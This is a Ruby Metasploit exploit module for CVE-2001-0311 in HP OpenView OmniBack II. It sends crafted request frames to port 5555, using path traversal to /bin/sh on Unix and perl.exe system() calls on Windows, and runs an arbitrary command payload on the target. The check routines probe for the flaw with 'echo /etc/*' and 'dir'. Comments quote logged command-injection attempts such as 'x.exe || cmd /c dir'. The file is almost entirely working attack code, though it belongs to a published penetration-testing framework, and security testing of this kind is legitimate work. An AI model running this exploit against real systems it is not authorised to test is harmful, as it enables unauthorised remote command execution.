GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/openview_omniback_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
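class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Leading fields of the request frame sent to the OmniBack II inet service.
  # The byte values are carried over unchanged from the original PoC; the
  # trailing "28" field matches the "request 28" entries in the inetnt log
  # excerpts quoted in #exploit.
  REQUEST_HEADER = [
    "\x00\x00\x00.2",
    "\x00 a",
    "\x00 0",
    "\x00 0",
    "\x00 0",
    "\x00 A",
    "\x00 28"
  ].join.freeze

  # Fields that close the request frame (also verbatim from the PoC).
  REQUEST_TRAILER = "\x00\x00digit AAAA\n\x00".freeze

  # Program field used for each of the two registered targets.
  UNIX_PROGRAM = '/../../../bin/sh'.freeze
  WINDOWS_PROGRAM = '\\perl.exe'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP OpenView OmniBack II Command Execution',
        'Description' => %q{
          This module uses a vulnerability in the OpenView Omniback II
          service to execute arbitrary commands. This vulnerability was
          discovered by DiGiT and his code was used as the basis for this
          module.

          For Microsoft Windows targets, due to module limitations, use the
          "unix/cmd/generic" payload and set CMD to your command. You can only
          pass a small amount of characters (4) to the command line on Windows.
        },
        'Author' => [ 'hdm', 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2001-0311'],
          ['OSVDB', '6018'],
          ['BID', '11032'],
          ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
        ],
        'Platform' => ['unix'], # win
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl telnet',
          }
        },
        'Targets' => [
          [ 'Unix', {}],
          [ 'Windows', {}],
        ],
        'DisclosureDate' => '2001-02-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(5555)
      ]
    )
  end

  # Probes the selected target for the vulnerability.
  #
  # Dispatches on the target name. Only the two targets registered above are
  # expected; any other name reports Unknown instead of falling through with
  # nil as the previous if/if chain did.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    case target.name
    when /Unix/ then check_unix
    when /Windows/ then check_windows
    else Exploit::CheckCode::Unknown
    end
  end

  # Sends the request frame for the selected target, followed on Unix by the
  # encoded payload, then reads the reply and starts the payload handler.
  #
  # @return [void]
  def exploit
    case target.name
    when /Unix/
      connect
      sock.put(omniback_request(UNIX_PROGRAM))
      sock.put(payload.encoded + ";\n")
      handle_response
    when /Windows/
      # aushack
      #
      # Tested during pen test against Windows 2003 server.
      # Windows Service details:
      # - Data Protector Inet
      # -> [HP OpenView Storage Data Protector] - Backup client service
      # -> "C:\Program Files\OmniBack\bin\omniinet.exe"
      # -> OmniInet service for Windows NT
      # -> File version: 6.0.0.0
      #
      # This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
      #
      # Notes:
      # I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
      # Perhaps a difference in Windows/Unix code? Logs:
      #
      # 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: ..\foo.exe
      #
      # 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
      #
      # 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

      connect
      sock.put(omniback_request(WINDOWS_PROGRAM, "\x00\x20-esystem(#{payload.encoded})"))
      # sock.put(payload.encoded + "\n")
      handle_response
    end
  end

  private

  # Builds one request frame: fixed header, a NUL separator, the program
  # field, any argument bytes, then the fixed trailer. The same frame layout
  # was previously duplicated in four places.
  #
  # @param program [String] value of the program field
  # @param args [String] bytes that follow the program field (default: none)
  # @return [String] the complete frame
  def omniback_request(program, args = '')
    REQUEST_HEADER + "\x00" + program + args + REQUEST_TRAILER
  end

  # Unix check: sends the frame and an echo of /etc/*, then looks for
  # well-known file names in the reply.
  #
  # @return [Msf::Exploit::CheckCode]
  def check_unix
    connect
    sock.put(omniback_request(UNIX_PROGRAM))
    sock.put("echo /etc/*;\n")
    res = sock.get_once(-1, 5)
    disconnect

    if res.to_s.empty?
      vprint_status("The remote service did not reply to our request")
      return Exploit::CheckCode::Safe
    end

    if res =~ /passwd|group|resolv/
      vprint_status("The remote service is exploitable")
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Windows check: sends the frame with perl's system(dir) and looks for the
  # "Volume" line of a directory listing. The reply carries a byte between
  # each letter (the original author noted it as Unicode), hence the dotted
  # pattern. The raw reply is printed before the emptiness guard, as before.
  #
  # @return [Msf::Exploit::CheckCode]
  def check_windows
    connect
    sock.put(omniback_request(WINDOWS_PROGRAM, "\x00\x20-e\x20system(dir)"))
    res = sock.get_once(-1, 5)
    disconnect

    print_status(res.to_s)

    if res.to_s.empty?
      print_status("The remote service did not reply to our request")
      return Exploit::CheckCode::Safe
    end

    if res =~ /V.o.l.u.m.e/ # Unicode
      print_status("The remote service is exploitable")
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Reads the reply to a request already sent on +sock+. An empty reply ends
  # the attempt; otherwise the reply is echoed and the payload handler is
  # started before the socket is closed. Shared by both targets of #exploit.
  #
  # @return [void]
  def handle_response
    res = sock.get_once(-1, 5)

    if res.to_s.empty?
      print_status("The remote service did not reply to our request")
      disconnect
      return
    end

    print(res)

    handler
    disconnect
  end
end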